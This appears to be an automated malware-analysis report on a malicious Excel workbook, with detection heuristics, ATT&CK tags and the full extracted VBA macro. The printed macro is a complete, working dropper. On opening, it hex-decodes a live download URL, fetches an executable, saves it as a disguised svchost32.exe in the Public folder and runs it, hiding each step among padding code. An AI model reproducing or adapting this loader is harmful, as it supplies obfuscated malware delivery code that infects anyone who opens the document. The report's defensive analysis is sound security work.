MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The Workbook_Open macro is triggered upon opening the Excel file (once macros are enabled). It contains obfuscated VBA code in which every indicator — the COM ProgIDs, the download URL and the drop path — is stored as a space-separated hex string and decoded at runtime by a helper function, so none of them appears in clear text in the macro source. The script uses CreateObject to instantiate 'Microsoft.XMLHTTP', 'ADODB.Stream' and 'WScript.Shell', issues a synchronous HTTP GET to 'http://13.234.238.111/gh/7110328.exe', writes the response body to 'C:\Users\Public\svchost32.exe' (a location writable without elevation, and a file name chosen to resemble the legitimate Windows svchost.exe) and then executes it via WScript.Shell.Run, indicating downloader/dropper functionality. The payload logic is interleaved with a large amount of benign cell-formatting code that serves only as padding. Note that the analysis is static: the extracted-artifact list below contains only the macro source, not the downloaded payload, so the second-stage behaviour is not characterised in this report.
Heuristics 6
-
ClamAV: Xls.Malware.Sagent-10035294-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA downloads and writes a file to disk — critical — OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody -
Obfuscated auto-exec VBA loader — critical — OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro (auto-executes when the document is opened). Matched line in script:
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6548 bytes |

SHA-256: 353af090280e87f9e670bc7fa5eaf56e78103d3ad26000aa803ca5fa80f1faee
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Excel runs this procedure as soon as the workbook
' is opened with macros enabled. Its only statement calls the downloader
' below, passing the URL as a space-separated hex string; the helper
' function at the end of this module decodes it at runtime to
' http://13.234.238.111/gh/7110328.exe, so the URL never appears in clear
' text in the macro source.
Private Sub Workbook_Open()
COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA"68 74 74 70 3A 2F 2F 31 33 2E 32 33 34 2E 32 33 38 2E 31 31 31 2F 67 68 2F 37 31 31 30 33 32 38 2E 65 78 65"
End Sub
' Downloader / dropper routine.
'   Link - hex-encoded URL (see Workbook_Open); decoded here before use.
' Behaviour established by the statements below: instantiate
' Microsoft.XMLHTTP, ADODB.Stream and WScript.Shell (ProgIDs hex-decoded
' at runtime), GET the URL synchronously, write the response body to
' C:\Users\Public\svchost32.exe and run that file.
' Everything that touches Range/Selection/ActiveCell is cell-formatting
' noise that does not feed into the download path; it appears to exist
' only to pad the procedure and dilute the indicators.
' There is no error handling and no Option Explicit visible in this
' excerpt: Url, urloasjdklweqad_babu and RUNCMD are undeclared (implicit
' Variants), and a failed request or write raises an unhandled runtime
' error rather than being checked.
Public Sub COmm0NAzs893TraCXVaPlCXFQAEWRGFYTDZCXFA(Link As String)
Range("A1:J22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' HTTP client object (Microsoft.XMLHTTP) - declared without a type, set below.
Dim hthsduerkbxvbhagasdjl_babu
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' Binary stream object (ADODB.Stream) used to persist the response body.
Dim strmweajsdjkvm_babu
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' Shell object (WScript.Shell) used to execute the dropped file.
Dim shelaorl_babu
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' "4d 69 63 72 ... 54 50" decodes to "Microsoft.XMLHTTP".
Set hthsduerkbxvbhagasdjl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' "41 44 4f 44 ... 61 6d" decodes to "ADODB.Stream".
Set strmweajsdjkvm_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
' "57 53 63 72 ... 6c 6c " decodes to "WScript.Shell" (the trailing space
' is tolerated by the decoder's 3-character stride).
Set shelaorl_babu = CreateObject(PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
ActiveWindow.SmallScroll Down:=-12
Range("A1").Select
ActiveCell.FormulaR1C1 = "S.No"
Range("B1").Select
ActiveCell.FormulaR1C1 = "Name"
Range("C1").Select
ActiveCell.FormulaR1C1 = "Unit"
Range("D1").Select
ActiveCell.FormulaR1C1 = "Price"
Range("E1").Select
ActiveCell.FormulaR1C1 = "Qty"
Range("F1:J22").Select
' Decode the hex-encoded URL passed in from Workbook_Open.
Url = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(Link)
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = False
End With
Selection.Merge
' Drop path: "43 3a 5c 55 ... 65 78 65" decodes to
' "C:\Users\Public\svchost32.exe". The name mimics the Windows svchost.exe
' binary; the folder needs no elevation to write to.
urloasjdklweqad_babu = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = xlVertical
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
' Same hex string decoded a second time - the command to run is the
' dropped file itself.
RUNCMD = PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S"
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y"
Range("F1:J22").Select
' Synchronous GET ("G" + "E" + "T" is split to avoid the literal "GET");
' the third argument False makes the call blocking.
hthsduerkbxvbhagasdjl_babu.Open "G" + "E" + "T", Url, False
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
' Send the request. The HTTP status is never checked, so whatever the
' server returns (including an error page) is written to disk below.
hthsduerkbxvbhagasdjl_babu.send
Range("F1:J22").Select
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
' Type = 1 (adTypeBinary): treat the stream as raw bytes, not text.
strmweajsdjkvm_babu.Type = 1
With Selection.Font
.Name = "Calibri"
.Size = 14
.Strikethrough = False
.Superscript = False
.Subscript = False
.OutlineFont = False
.Shadow = False
.Underline = xlUnderlineStyleNone
.ThemeColor = xlThemeColorLight1
.TintAndShade = 0
.ThemeFont = xlThemeFontMinor
End With
strmweajsdjkvm_babu.Open
Selection.Font.Bold = True
' Copy the raw HTTP response body into the stream.
strmweajsdjkvm_babu.write hthsduerkbxvbhagasdjl_babu.responseBody
Selection.Font.Italic = True
' SaveToFile with option 2 (adSaveCreateOverWrite): overwrite any existing
' C:\Users\Public\svchost32.exe.
strmweajsdjkvm_babu.savetofile urloasjdklweqad_babu, 2
Range("L4").Select
' Execute the dropped file via WScript.Shell.Run.
shelaorl_babu.Run RUNCMD
End Sub
' String deobfuscation helper used for every indicator in this module.
' Input: a string of two-digit hex byte values separated by single spaces
' (e.g. "4d 69 63"); the loop steps through it three characters at a time
' (hex pair plus separator) and converts each pair with Val("&H..") and
' Chr$. A trailing separator is harmless because Mid$ just reads the pair
' at each 3-character offset. Returns the decoded ASCII text.
Public Function PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW(ByVal AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV As String) As String
' Single decoded character for the current hex pair.
Dim wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa As String
' Accumulated output string.
Dim BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT As String
' 1-based position of the current hex pair in the input.
Dim mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev As Long
For mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev = 1 To Len(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV) Step 3
' "&H" prefix makes Val parse the two characters as hexadecimal.
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val("&H" & Mid$(AZplOKICbdgCBDgTrADSfPlo9823FCSdNmmBCGFTADSCXV, mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev, 2)))
BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next mVTzrmmdSuUPlQfWzeYutCDYutRakyzZEDePAULnBGOttZQAoINrcev
PXcZFADsUy76FSRdPLVABY7609GffsdAxzsaMOPLQAW = BskNReMCJaZCoNQWxhdNHPWROasZurAFICRkzTCZSOMTNogwUKNAfZT
End Function
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True